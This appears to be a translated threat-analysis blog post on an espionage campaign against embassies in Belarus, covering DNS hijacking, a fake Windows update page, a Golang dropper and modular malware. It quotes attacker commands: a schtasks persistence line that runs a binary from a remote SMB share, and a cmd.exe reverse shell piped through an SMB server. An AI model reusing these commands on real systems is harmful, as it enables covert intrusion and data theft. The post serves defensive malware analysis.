Table of contents
- Investigating the attack on embassies in Belarus
- Initial access under the pretext of Windows update
- Malware, ready for delivery and execution
- Analysis of modular malware
- Analysis of malware from this attack and previous similar attacks
- Conclusion
Investigating the attack on embassies in Belarus
One of the officials of the NSA organization, in one of the recent conferences to explain his work, uses a simple definition: “Our work is simply to produce foreign information. “When it comes to infiltrating diplomatic or political centers, most of the time the goal is to extract information, nothing else.”
It is important to maintain long-term accessibility for groups that are a subset of this goal; So they carry out their attack with complex and less known techniques. In this article, we examine one of the attacks on diplomats of countries based in Belarus and analyze the techniques used, such as AitM (adversary-in-the-middle), DNS Exfiltration, and malware used to collect information.
Initial access under the pretext of Windows update
Suppose you take your laptop to a public place, such as a cafe, and order a coffee. In order for the coffee to be prepared, you will want to connect to the cafe’s internet via your laptop.
Checking the status of connecting to the Internet in Microsoft Documents is such that in Windows version 8 and later, your operating system first sends a request to your DNS server to find the address www.msftconnecttest.com . If the DNS request was successful, it sends an HTTP request to https://www.msftconnecttest.com/connecttest.txt and downloads the text file through it to verify that we are connected to the Internet ( source ). What happens if a hacker tampers with this process? In fact, this attack is known as AitM (adversary-in-the-middle).
The DNS structure is such that the user enters the Google site address in his browser and then the request is sent to the ISP (Internet Service Provider). At the ISP, DNS servers are specified for the Google site address, which, like a dictionary, translates the Google site address to the desired IP address. For example, the translation of the Google site address is 10.20.30.40 and then the desired output is returned to the router/modem and the user’s system and is directed to the Google site. Here the DNS request is sent to the address www.msftconnecttest.com ; But it is directed to a malicious address, which is the desired path of the hacker. The two questions that should arise in your mind are: 1. How does this happen? 2. To which malicious address is directed.
In response to the first question, in some countries, such as Russia, in 2014, ISPs were required to install devices called SORM-3 on their devices and servers, which allow the Russian Intelligence Service (FSB), tampering and eavesdropping. Provides deep packet inspection ( source ). The history of this type of attacks in 2018 was due to downloading Windows applications from Microsoft servers in Turkey and Egypt and installing a miner instead. In fact, Packet replaces your system with something else in a fraction of a second ( source ).
In response to the second question, we should also say that it will be directed to the address https://updates.microsoft[.]com/ , then a page will appear in Belarusian for updating.
Maybe you enter this address in your browser and see the Page Not Found statement. In fact, this address does not exist abroad and is only possible for victims of that country and using the same ISP; Because only the same packet is manipulated.
One thing to note is that personal systems of residents around that embassy or diplomatic center in Belarus who use the same ISP are not attacked, only those embassies are attacked. The question that arises is how hackers know which packet belongs to whom? The IP address 5.45.121[.].106, which is directed to the malicious address, belongs to the range of domains on which there is no online service and has been deleted at the discretion of the domain. This IP cannot be random; Because the victim should be clear [which he is] and another user should not be mistakenly infected. (The point that is always visible in complex attacks is that in order to maintain the cover of the attack and remain hidden from the public and security experts, the scope of the attack must be limited only to the same target and not be mistakenly contaminated elsewhere. (It will cause the attack to crash and be exposed.)
Malware, ready for delivery and execution
After the victim visits the URL of the infected page (which we checked) and clicks the update option, behind the scenes, the attacker’s JavaScript code starts working. The page that appears due to the update is as follows:
After pressing the update button, the update function executes the following code:
As you can see in the image, the above code downloads the MicorosftUpdate845255.zip file to the victim. (One of the little things hackers do to hide their attack is to misuse the names of reputable companies for their malware or droppers.)
After extracting and installing the MicrosftUpdate845255.exe file, this file acts as a dropper and initial stager.
(High-level and complex attacks do not execute the original malware the first time, and after checking the environment, they proceed to put the backdoor and the original malware.) Our desired file, written in Golang language, creates a task in the Windows Task Scheduler, which the following command executes:
schtasks /create /sc minute /mo 1 /tn OfficeBrokerTask /tr \\35.214.56.2\OfficeBroker\OfficeBroker.exe
The points in the above command:
1. Without running the OfficeBroker.exe file on the victim’s disk, it runs in the operating system’s memory and the attack is so-called Fileless (one of the golden points in OPSEC compliance).
2. The IP address belongs to Google Cloud; That is, the same AitM attack. with the difference that this time in the SMB protocol instead of HTTP. Also, from the two backslashes that precede the IP address 2[.] 35.214.56\\, we can tell that it is SMB.
Summary diagram of the attack in the initial access phase:
Also, the OfficeBroker.exe file acts as another downloader. Also, it can download and run modular malware, such as keyloggers, voice recorders, capture victim file lists, etc., which we will explore together. By examining the artifacts (factors) and analyzing the programming style, it is possible to reach other malwares of this group in similar attacks. In 2020, this attack was executed again, which was directed to the malicious address https://mail.mfa.gov.<redacted>/EdgeUpdate.exe, and after execution, the EdgeUpdate.exe malware started to create and execute tasks with more creativity. We would check together:
A task with the highest possible access, called EdgeUpdateA, is created in the MicrosoftUpdate folder. This task with the argument sc/; That is, it is executed every minute and specifies the path of the executable file with the tr/ argument.
But check the interesting point:
\EDGEUPDATE\WINCMDA.exe cmd.exe /c type \\24.9.51[.]94\EDGEUPDATE\EDGEAIN | cmd.exe 1> \\24.9.51.94\EDGEUPDATE\EDGEOUT 2> &1
Here we have a Reverse Shell with a delay of one second. WINCMDA.exe is the same as cmd.exe whose name has been changed, c/ means execute the command first and close after execution, type also means read the contents of the file; So let’s summarize: it reads the content of the file from the server as SMB from the content of the EDGEAIN file and prints the output of the command as a pipe in EDGEOUT.
Let’s run some commands together:
In the content of the in file that takes input, we put these commands:
Let’s see the output:
Analysis of modular malware
In the OfficeBroker.exe file, we have a malware in Golang language that used the https://github.com/mozey/schtasks library to create a task and download the rest of the malware, according to the hacker’s instructions:
In the last part of the image above, we see a DNS query to the address windows.system.update[.]com.
The domain windows.system.update[.]com does not exist externally and most likely, with the AitM technique, informs the attacker’s C&C of the registration (initial contamination of the victim); so that DNS requests the address windows.system.update[.]com; But because this record does not exist in the nameservers of the user’s device or the infected network, the request is sent outside the network and reaches the hacker’s DNS server. The downloader and dropper malware of this attack are simple and written with Golangi libraries.
You must be logged in to post a comment.